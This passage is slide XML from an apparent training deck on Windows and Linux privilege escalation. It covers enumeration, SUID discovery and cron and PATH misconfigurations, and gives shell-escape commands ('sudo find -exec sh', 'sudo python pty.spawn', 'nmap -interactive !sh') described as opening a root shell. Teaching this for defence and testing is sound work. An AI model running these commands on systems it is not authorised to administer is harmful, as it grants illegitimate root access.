                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Check the link for what to exploit,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://book.hacktricks.xyz/windows/windows-local-privilege-escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76563496-9BB7-4B2F-AED4-4E198B71F6A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="34301" r="33168" b="35311"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1543843"/>
            <a:ext cx="8652445" cy="2213129"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="305752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43435" y="95700"/>
            <a:ext cx="8875059"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Linux Privilege Escalation</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500" dirty="0"/>
              <a:t>In Linux systems, attackers use a process called “enumeration” to identify weaknesses that may allow privilege escalation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Using Google searches, port scanning and direct interaction with a system to learn more about it and see how it responds to inputs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Seeing if compilers, or high-level programming languages like Perl or Python, are available, which can allow an attacker to run exploit code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Identifying software components, such as web servers and their versions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Retrieving data from key system directories such as /etc, /proc, ipconfig, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1"/>
              <a:t>lsof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>, netstat and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="382124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43435" y="95700"/>
            <a:ext cx="8875059"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Linux Privilege Escalation</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GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploit Kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploit services running as root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>, vulnerable version of MySQL could be exploited this way</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netstat –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>antup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> shows ports which are open and listening </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploit vulnerable SUID executable to get root access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>find / -perm -u=s -type f 2&gt;/dev/null </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> shows executables with SUID bit set</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>The ‘s’ character instead of ‘x’ indicates that the SUID bit is set.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Older version of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t> had an interactive shell and could be exploited by running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -interactive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>and !</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5ABC4485-A302-4A00-A706-08ED5D3E4739}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="778405" y="3781292"/>
            <a:ext cx="6771709" cy="419465"/>
            <a:chOff x="653044" y="2991617"/>
            <a:chExt cx="6771709" cy="419465"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3" name="Picture 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{120552E9-1B46-4E08-BE75-0DA14D94DEC1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3"/>
            <a:srcRect l="53950" t="87277" r="35217" b="11234"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="653044" y="3175338"/>
              <a:ext cx="5890089" cy="235744"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Picture 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DCF0D02-54A1-41E8-B4E0-44E73D366EFD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4"/>
            <a:srcRect l="50000" t="89969" r="35455" b="8567"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="653044" y="2991617"/>
              <a:ext cx="6771709" cy="183721"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="182744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43435" y="95700"/>
            <a:ext cx="8875059" cy="576000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux – Exploiting SUDO Rights</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004991"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploiting SUDO rights</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> show commands which we can run as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> find /home -exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -i \; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t> find command’s exec parameter can be used for arbitrary code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> python -c 'import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pty;pty.spawn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("/bin/bash");’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>-&gt; opens root shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploit badly configured </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t> jobs to get root access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ls -la /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cron.d</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploiting users with ‘.’ in their PATH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PATH=.:${PATH}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
